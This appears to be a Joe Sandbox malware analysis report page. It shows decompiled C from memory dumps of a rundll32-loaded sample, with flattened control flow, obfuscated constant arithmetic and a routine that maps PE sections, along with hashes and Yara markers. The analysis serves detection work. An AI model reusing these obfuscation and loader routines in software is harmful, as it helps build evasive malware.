                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: 2f197765f0ae87ebe4456bd061b13063fd480f1776b3962b4b2e30900a17cc2c
                                                                                                                      • Instruction ID: a87f2c7709024c446236beebd70d04b61b06079844b6cd869521092c2788d0d1
                                                                                                                      • Opcode Fuzzy Hash: 2f197765f0ae87ebe4456bd061b13063fd480f1776b3962b4b2e30900a17cc2c
                                                                                                                      • Instruction Fuzzy Hash: 097174714083809BD768DE25C489A1FBBF2BFC5758F94590EF98696260C3B58A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017F58F Relevance: 5.2, Strings: 4, Instructions: 166COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0017F58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v560;
				char _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t129;
				signed int _t143;
				signed int _t144;
				void* _t151;
				signed int _t155;
				char _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int* _t181;

				_push(_a12);
				_t173 = _a4;
				_push(_a8);
				_push(_t173);
				_push(E00190CF5);
				_push(__ecx);
				E0017CF25(_t129);
				_v660 = 0x8d8445;
				_t181 =  &(( &_v680)[5]);
				_t151 = 0x740f7fb;
				_t174 = 0x71;
				_v660 = _v660 / _t174;
				_v660 = _v660 ^ 0x128b90b3;
				_v660 = _v660 ^ 0x128ad02b;
				_v640 = 0x9067b5;
				_v640 = _v640 + 0x286c;
				_v640 = _v640 ^ 0x00975038;
				_v632 = 0x5011ea;
				_v632 = _v632 + 0xffff22a1;
				_v632 = _v632 ^ 0x00475e04;
				_v628 = 0xc0b5ed;
				_v628 = _v628 | 0x09c79ac0;
				_v628 = _v628 ^ 0x09cd8243;
				_v652 = 0x6be172;
				_v652 = _v652 << 0xe;
				_v652 = _v652 ^ 0xf9ae6093;
				_v652 = _v652 ^ 0x01f8093d;
				_v644 = 0xbd5efb;
				_v644 = _v644 << 3;
				_v644 = _v644 ^ 0x05e3f72f;
				_v656 = 0xc95ad0;
				_t175 = 0x15;
				_v656 = _v656 / _t175;
				_v656 = _v656 | 0xa2f71cc0;
				_v656 = _v656 ^ 0xa2f780bc;
				_v676 = 0xbb6512;
				_v676 = _v676 << 0x10;
				_v676 = _v676 ^ 0x67ff039f;
				_v676 = _v676 + 0xffff3430;
				_v676 = _v676 ^ 0x02e7c46b;
				_v636 = 0x771a54;
				_v636 = _v636 >> 0xf;
				_v636 = _v636 ^ 0x000f324c;
				_v680 = 0x44376b;
				_v680 = _v680 + 0xffff61f8;
				_v680 = _v680 + 0xffff924c;
				_v680 = _v680 << 0xc;
				_v680 = _v680 ^ 0x32b3ed2b;
				_v672 = 0x492cee;
				_v672 = _v672 | 0xff7fdef6;
				_v672 = _v672 ^ 0xff79836a;
				_v664 = 0x821e3f;
				_v664 = _v664 + 0xffff0102;
				_v664 = _v664 << 0xd;
				_v664 = _v664 ^ 0x23edf1fd;
				_v648 = 0xfa5772;
				_v648 = _v648 + 0x1fee;
				_v648 = _v648 ^ 0x00f8d439;
				_v668 = 0x765780;
				_t176 = 0x5a;
				_v668 = _v668 / _t176;
				_t177 = 0x7e;
				_t178 = _v648;
				_v668 = _v668 / _t177;
				_v668 = _v668 ^ 0x0009a212;
				L1:
				while(_t151 != 0x4c653bf) {
					if(_t151 == 0x50dca7b) {
						_v560 = 0x22c;
						_t144 = E00190296( &_v560, _v644, _t178, _v656, _v676);
						_t181 =  &(_t181[3]);
						L10:
						asm("sbb ecx, ecx");
						_t155 =  ~_t144 & 0x074f90c1;
						L8:
						_t151 = _t155 + 0x59cade0;
						continue;
					}
					if(_t151 == 0x59cade0) {
						return E00184DAD(_v672, _v664, _t178, _v648, _v668);
					}
					if(_t151 == 0x740f7fb) {
						_v624 = _t173;
						_t151 = 0x4c653bf;
						continue;
					}
					if(_t151 == 0xc1665e4) {
						_t144 = E0018E3F7(_v636, _t178,  &_v560, _v680);
						goto L10;
					}
					_t190 = _t151 - 0xcec3ea1;
					if(_t151 != 0xcec3ea1) {
						L16:
						__eflags = _t151 - 0x2876c78;
						if(__eflags != 0) {
							continue;
						}
						return _t144;
					}
					_t144 = E00190CF5(_t151, _t190,  &_v560,  &_v624);
					asm("sbb ecx, ecx");
					_t155 =  ~_t144 & 0x0679b804;
					goto L8;
				}
				_t143 = E00173C3B(_t151, _v660);
				_t178 = _t143;
				_t181 = _t181 - 0xc + 0x10;
				__eflags = _t143 - 0xffffffff;
				if(__eflags == 0) {
					_t151 = 0x2876c78;
					goto L16;
				}
				_t151 = 0x50dca7b;
				goto L1;
			}






























                                                                                                                      0x0017f599
                                                                                                                      0x0017f5a0
                                                                                                                      0x0017f5a7
                                                                                                                      0x0017f5ae
                                                                                                                      0x0017f5af
                                                                                                                      0x0017f5b4
                                                                                                                      0x0017f5b5
                                                                                                                      0x0017f5ba
                                                                                                                      0x0017f5c2
                                                                                                                      0x0017f5cb
                                                                                                                      0x0017f5d2
                                                                                                                      0x0017f5d7
                                                                                                                      0x0017f5dd
                                                                                                                      0x0017f5e5
                                                                                                                      0x0017f5ed
                                                                                                                      0x0017f5f5
                                                                                                                      0x0017f5fd
                                                                                                                      0x0017f605
                                                                                                                      0x0017f60d
                                                                                                                      0x0017f615
                                                                                                                      0x0017f61d
                                                                                                                      0x0017f625
                                                                                                                      0x0017f62d
                                                                                                                      0x0017f635
                                                                                                                      0x0017f63d
                                                                                                                      0x0017f642
                                                                                                                      0x0017f64a
                                                                                                                      0x0017f652
                                                                                                                      0x0017f65a
                                                                                                                      0x0017f65f
                                                                                                                      0x0017f667
                                                                                                                      0x0017f673
                                                                                                                      0x0017f678
                                                                                                                      0x0017f67e
                                                                                                                      0x0017f686
                                                                                                                      0x0017f68e
                                                                                                                      0x0017f696
                                                                                                                      0x0017f69b
                                                                                                                      0x0017f6a3
                                                                                                                      0x0017f6ab
                                                                                                                      0x0017f6b3
                                                                                                                      0x0017f6bb
                                                                                                                      0x0017f6c0
                                                                                                                      0x0017f6c8
                                                                                                                      0x0017f6d0
                                                                                                                      0x0017f6d8
                                                                                                                      0x0017f6e0
                                                                                                                      0x0017f6e5
                                                                                                                      0x0017f6ed
                                                                                                                      0x0017f6f5
                                                                                                                      0x0017f6fd
                                                                                                                      0x0017f705
                                                                                                                      0x0017f70d
                                                                                                                      0x0017f715
                                                                                                                      0x0017f71a
                                                                                                                      0x0017f722
                                                                                                                      0x0017f72a
                                                                                                                      0x0017f732
                                                                                                                      0x0017f73a
                                                                                                                      0x0017f746
                                                                                                                      0x0017f74b
                                                                                                                      0x0017f755
                                                                                                                      0x0017f758
                                                                                                                      0x0017f761
                                                                                                                      0x0017f76a
                                                                                                                      0x00000000
                                                                                                                      0x0017f772
                                                                                                                      0x0017f780
                                                                                                                      0x0017f805
                                                                                                                      0x0017f819
                                                                                                                      0x0017f81e
                                                                                                                      0x0017f7e1
                                                                                                                      0x0017f7e5
                                                                                                                      0x0017f7e7
                                                                                                                      0x0017f7c4
                                                                                                                      0x0017f7c4
                                                                                                                      0x00000000
                                                                                                                      0x0017f7c4
                                                                                                                      0x0017f784
                                                                                                                      0x00000000
                                                                                                                      0x0017f87c
                                                                                                                      0x0017f790
                                                                                                                      0x0017f7ef
                                                                                                                      0x0017f7f3
                                                                                                                      0x00000000
                                                                                                                      0x0017f7f3
                                                                                                                      0x0017f798
                                                                                                                      0x0017f7da
                                                                                                                      0x00000000
                                                                                                                      0x0017f7e0
                                                                                                                      0x0017f79a
                                                                                                                      0x0017f7a0
                                                                                                                      0x0017f858
                                                                                                                      0x0017f858
                                                                                                                      0x0017f85e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017f85e
                                                                                                                      0x0017f7b3
                                                                                                                      0x0017f7bc
                                                                                                                      0x0017f7be
                                                                                                                      0x00000000
                                                                                                                      0x0017f7be
                                                                                                                      0x0017f83a
                                                                                                                      0x0017f83f
                                                                                                                      0x0017f841
                                                                                                                      0x0017f844
                                                                                                                      0x0017f847
                                                                                                                      0x0017f853
                                                                                                                      0x00000000
                                                                                                                      0x0017f853
                                                                                                                      0x0017f849
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 32602432165a2761d564276766235f0de167f20635aaa46c92a223de1b0facdc
                                                                                                                      • Instruction ID: abdfd920f3d70f66d7d3ca62d9be3f2deee97b5cc32b93a6b8d3e4fa420b80dc
                                                                                                                      • Opcode Fuzzy Hash: 32602432165a2761d564276766235f0de167f20635aaa46c92a223de1b0facdc
                                                                                                                      • Instruction Fuzzy Hash: 9D717C715093019BC768DF24D58985FBBF1FBC4754F508A2EF69A96260D770890ACF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00188D71 Relevance: 5.1, Strings: 4, Instructions: 135COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00188D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t119;
				void* _t128;
				void* _t138;
				void* _t140;
				signed int _t142;
				signed int _t143;
				void* _t158;
				void* _t163;
				signed int* _t167;
				signed int* _t168;
				signed int* _t169;

				_t165 = _a12;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t119);
				_v4 = _v4 & 0x00000000;
				_v12 = 0xd63ca;
				_v8 = 0x2a80fb;
				_v32 = 0xd656a7;
				_t142 = 0x2a;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x62cbe0fa;
				_v60 = 0xd42ea;
				_v60 = _v60 | 0xae184de3;
				_v60 = _v60 * 0x64;
				_v60 = _v60 ^ 0xa1370c8b;
				_v60 = _v60 ^ 0xa2441b47;
				_v28 = 0x613a22;
				_v28 = _v28 + 0xe1cd;
				_v28 = _v28 ^ 0x00621baf;
				_v48 = 0x1555f7;
				_v48 = _v48 | 0xf97f7abf;
				_v48 = _v48 ^ 0xf978b226;
				_v36 = 0xa4495c;
				_v36 = _v36 << 0xc;
				_v36 = _v36 ^ 0x449a63ff;
				_v64 = 0xc77e0d;
				_v64 = _v64 * 0x7d;
				_v64 = _v64 << 3;
				_v64 = _v64 / _t142;
				_v64 = _v64 ^ 0x0042e8ad;
				_v24 = 0xcd3d37;
				_v24 = _v24 ^ 0xb946add1;
				_v24 = _v24 ^ 0xb982581d;
				_v40 = 0xe4266b;
				_v40 = _v40 << 9;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x064c7215;
				_v44 = 0x9ee2d0;
				_v44 = _v44 + 0xdca1;
				_v44 = _v44 ^ 0x9755f080;
				_v44 = _v44 ^ 0x97c96657;
				_v20 = 0xa48706;
				_v20 = _v20 | 0xe10b6776;
				_v20 = _v20 ^ 0xe1a97c21;
				_v56 = 0x583a03;
				_v56 = _v56 * 0x56;
				_v56 = _v56 + 0x9dad;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0xd77aa722;
				_v52 = 0xf9a5b4;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffff4c61;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x033f85cc;
				_v16 = 0x1cccaa;
				_v16 = _v16 + 0x745b;
				_v16 = _v16 ^ 0x0015a734;
				_t143 = _v48;
				_t128 = E0018BE0B(_t143, _v36, _v64, _a12);
				_t138 = _t128;
				_t167 =  &(( &_v64)[8]);
				if(_t138 != 0) {
					_push(_t143);
					_t158 = E0017B0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
					_t168 =  &(_t167[5]);
					if(_t158 == 0) {
						L6:
						return _t158;
					}
					E0018FD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
					_t169 =  &(_t168[3]);
					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
					while(_t163 < _t140) {
						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
						E0018FD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
						_t169 =  &(_t169[3]);
						_t163 = _t163 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}






























                                                                                                                      0x00188d76
                                                                                                                      0x00188d7a
                                                                                                                      0x00188d7c
                                                                                                                      0x00188d7d
                                                                                                                      0x00188d81
                                                                                                                      0x00188d85
                                                                                                                      0x00188d86
                                                                                                                      0x00188d87
                                                                                                                      0x00188d8c
                                                                                                                      0x00188d93
                                                                                                                      0x00188d9b
                                                                                                                      0x00188da3
                                                                                                                      0x00188db2
                                                                                                                      0x00188db4
                                                                                                                      0x00188db8
                                                                                                                      0x00188dc0
                                                                                                                      0x00188dc8
                                                                                                                      0x00188dd5
                                                                                                                      0x00188dd9
                                                                                                                      0x00188de1
                                                                                                                      0x00188de9
                                                                                                                      0x00188df1
                                                                                                                      0x00188df9
                                                                                                                      0x00188e01
                                                                                                                      0x00188e09
                                                                                                                      0x00188e11
                                                                                                                      0x00188e19
                                                                                                                      0x00188e21
                                                                                                                      0x00188e26
                                                                                                                      0x00188e2e
                                                                                                                      0x00188e3b
                                                                                                                      0x00188e3f
                                                                                                                      0x00188e4a
                                                                                                                      0x00188e4e
                                                                                                                      0x00188e56
                                                                                                                      0x00188e5e
                                                                                                                      0x00188e66
                                                                                                                      0x00188e6e
                                                                                                                      0x00188e76
                                                                                                                      0x00188e7b
                                                                                                                      0x00188e80
                                                                                                                      0x00188e88
                                                                                                                      0x00188e90
                                                                                                                      0x00188e98
                                                                                                                      0x00188ea0
                                                                                                                      0x00188ea8
                                                                                                                      0x00188eb0
                                                                                                                      0x00188eb8
                                                                                                                      0x00188ec0
                                                                                                                      0x00188ecd
                                                                                                                      0x00188ed1
                                                                                                                      0x00188ede
                                                                                                                      0x00188ee2
                                                                                                                      0x00188eea
                                                                                                                      0x00188ef2
                                                                                                                      0x00188ef7
                                                                                                                      0x00188eff
                                                                                                                      0x00188f04
                                                                                                                      0x00188f0c
                                                                                                                      0x00188f14
                                                                                                                      0x00188f1c
                                                                                                                      0x00188f2c
                                                                                                                      0x00188f30
                                                                                                                      0x00188f35
                                                                                                                      0x00188f37
                                                                                                                      0x00188f3c
                                                                                                                      0x00188f4b
                                                                                                                      0x00188f65
                                                                                                                      0x00188f67
                                                                                                                      0x00188f6c
                                                                                                                      0x00188fc9
                                                                                                                      0x00000000
                                                                                                                      0x00188fcb
                                                                                                                      0x00188f7e
                                                                                                                      0x00188f87
                                                                                                                      0x00188f91
                                                                                                                      0x00188f96
                                                                                                                      0x00188fc4
                                                                                                                      0x00188fab
                                                                                                                      0x00188fb9
                                                                                                                      0x00188fbe
                                                                                                                      0x00188fc1
                                                                                                                      0x00188fc1
                                                                                                                      0x00000000
                                                                                                                      0x00188fc8
                                                                                                                      0x00188fd1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: bb07d28905f9fa7620ff9bd56e4bb22cf54fc8f7e85b2c878dda0ba406e3bb5d
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 7F5111B15083809FC354CF65C98691BFBF2BBC8748F409A1DFA995A220D7B5DA498F06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001845CD Relevance: 4.0, Strings: 3, Instructions: 258COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E001845CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				unsigned int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* __ecx;
				void* _t260;
				intOrPtr _t280;
				intOrPtr _t283;
				void* _t285;
				intOrPtr _t286;
				void* _t288;
				intOrPtr* _t291;
				void* _t293;
				intOrPtr _t310;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t317;
				void* _t318;

				_t291 = _a8;
				_t312 = _a4;
				_push(_t291);
				_push(_a4);
				_push(__edx);
				E0017CF25(_t260);
				_v16 = 0xeda856;
				_t310 = 0;
				_v12 = 0;
				_t318 = _t317 + 0x10;
				_v8 = 0;
				_v108 = 0x9530b9;
				_t293 = 0x1386c75;
				_v108 = _v108 + 0xffff8498;
				_v108 = _v108 + 0xffff62a2;
				_v108 = _v108 ^ 0x009417f2;
				_v72 = 0x4d29da;
				_v72 = _v72 | 0x3a723bc7;
				_v72 = _v72 ^ 0x3a7f3bde;
				_v68 = 0xbb7b0e;
				_v68 = _v68 | 0x90968cd5;
				_v68 = _v68 ^ 0x90bfffdf;
				_v32 = 0x962435;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2c486a00;
				_v124 = 0x38cf9b;
				_t313 = 0x3a;
				_v124 = _v124 * 0x5b;
				_v124 = _v124 / _t313;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x02c91350;
				_v104 = 0xa200dd;
				_v104 = _v104 ^ 0x0aab722c;
				_v104 = _v104 + 0xffff0d17;
				_v104 = _v104 ^ 0x0a088008;
				_v136 = 0xa03782;
				_v136 = _v136 >> 4;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 + 0xffffdc54;
				_v136 = _v136 ^ 0xffffdc68;
				_v100 = 0xea2f66;
				_v100 = _v100 + 0xffffd1b3;
				_v100 = _v100 + 0xffff51f8;
				_v100 = _v100 ^ 0x00e840e3;
				_v132 = 0xadb516;
				_v132 = _v132 + 0xffff9028;
				_v132 = _v132 * 0x44;
				_v132 = _v132 + 0xffffe891;
				_v132 = _v132 ^ 0x2e08c107;
				_v140 = 0xeec816;
				_v140 = _v140 >> 7;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 << 5;
				_v140 = _v140 ^ 0x000acf9f;
				_v116 = 0xb8b4c3;
				_v116 = _v116 + 0x5cf4;
				_v116 = _v116 + 0xffff9c7f;
				_v116 = _v116 ^ 0x00b90cd0;
				_v144 = 0x42ac99;
				_v144 = _v144 + 0xfffff6b6;
				_v144 = _v144 | 0xd26fea09;
				_v144 = _v144 + 0xcbeb;
				_v144 = _v144 ^ 0xd277b085;
				_v96 = 0x1bc5eb;
				_v96 = _v96 * 0x6c;
				_v96 = _v96 + 0x8f6c;
				_v96 = _v96 ^ 0x0bb05dde;
				_v48 = 0x1a2576;
				_v48 = _v48 * 0x64;
				_v48 = _v48 ^ 0x0a36ba39;
				_v88 = 0xc7f5d;
				_v88 = _v88 >> 4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x00037446;
				_v84 = 0x3f34b5;
				_t314 = 0x5e;
				_v84 = _v84 * 0x31;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x000d159a;
				_v120 = 0x5d4df8;
				_v120 = _v120 + 0xffffa239;
				_v120 = _v120 << 4;
				_v120 = _v120 ^ 0x05c58312;
				_v60 = 0x26932d;
				_v60 = _v60 / _t314;
				_v60 = _v60 ^ 0x000131ea;
				_v28 = 0x785747;
				_v28 = _v28 ^ 0x77c5d7dc;
				_v28 = _v28 ^ 0x77b818bc;
				_v56 = 0xd134ba;
				_t315 = 0x67;
				_v56 = _v56 * 7;
				_v56 = _v56 ^ 0x05bb4239;
				_v40 = 0xd9afd1;
				_v40 = _v40 * 0x25;
				_v40 = _v40 ^ 0x1f79b6d7;
				_v128 = 0x3f4f78;
				_v128 = _v128 / _t315;
				_v128 = _v128 | 0x7b2b5a07;
				_v128 = _v128 + 0xfffffa98;
				_v128 = _v128 ^ 0x7b2edba2;
				_v80 = 0xe956c4;
				_v80 = _v80 << 5;
				_v80 = _v80 ^ 0x1d2c49e8;
				_v64 = 0x3f3e0b;
				_v64 = _v64 * 5;
				_v64 = _v64 ^ 0x01394f8d;
				_v112 = 0xfc7f0a;
				_v112 = _v112 + 0xffff18e0;
				_v112 = _v112 + 0xffffa855;
				_v112 = _v112 ^ 0x00f14c19;
				_v92 = 0x78d624;
				_v92 = _v92 << 6;
				_v92 = _v92 + 0xffffec5c;
				_v92 = _v92 ^ 0x1e335a68;
				_v36 = 0xd9641a;
				_v36 = _v36 + 0xffff84de;
				_v36 = _v36 ^ 0x00d9de20;
				_v44 = 0x6f829b;
				_v44 = _v44 ^ 0xdbcb61d0;
				_v44 = _v44 ^ 0xdba9195b;
				_v52 = 0xea26f7;
				_v52 = _v52 + 0xffff0808;
				_v52 = _v52 ^ 0x00eef997;
				_v76 = 0xef1604;
				_v76 = _v76 + 0xfcdc;
				_v76 = _v76 + 0xffff9946;
				_v76 = _v76 ^ 0x00e2e7da;
				while(_t293 != 0x1386c75) {
					if(_t293 == 0x185c552) {
						_push(_t293);
						_push(_t293);
						_t280 = E00183512(_v20);
						_v24 = _t280;
						if(_t280 != 0) {
							_t293 = 0x84b6bf9;
							continue;
						}
					} else {
						if(_t293 == 0x1b7bba2) {
							E001768DE(_v36, _v44, _v52, _v76, _v24);
						} else {
							if(_t293 == 0x8150c28) {
								_t283 =  *0x195c9c; // 0x0
								_t285 = E0017AD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
								_t318 = _t318 + 0x40;
								if(_t285 == _v124) {
									_t293 = 0x185c552;
									continue;
								}
							} else {
								if(_t293 != 0x84b6bf9) {
									L13:
									if(_t293 != 0x3792bf2) {
										continue;
									} else {
									}
								} else {
									_t286 =  *0x195c9c; // 0x0
									_t222 =  &_v128; // 0xe840e3
									_t288 = E0017AD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
									_t318 = _t318 + 0x40;
									if(_t288 == _v136) {
										 *_t291 = _v24;
										_t310 = 1;
										 *((intOrPtr*)(_t291 + 4)) = _v20;
									} else {
										_t293 = 0x1b7bba2;
										continue;
									}
								}
							}
						}
					}
					return _t310;
				}
				_t293 = 0x8150c28;
				goto L13;
			}





















































                                                                                                                      0x001845d4
                                                                                                                      0x001845dd
                                                                                                                      0x001845e5
                                                                                                                      0x001845e6
                                                                                                                      0x001845e7
                                                                                                                      0x001845e9
                                                                                                                      0x001845ee
                                                                                                                      0x001845f9
                                                                                                                      0x001845fb
                                                                                                                      0x00184602
                                                                                                                      0x00184605
                                                                                                                      0x0018460e
                                                                                                                      0x00184616
                                                                                                                      0x0018461b
                                                                                                                      0x00184623
                                                                                                                      0x0018462b
                                                                                                                      0x00184633
                                                                                                                      0x0018463b
                                                                                                                      0x00184643
                                                                                                                      0x0018464b
                                                                                                                      0x00184653
                                                                                                                      0x0018465b
                                                                                                                      0x00184663
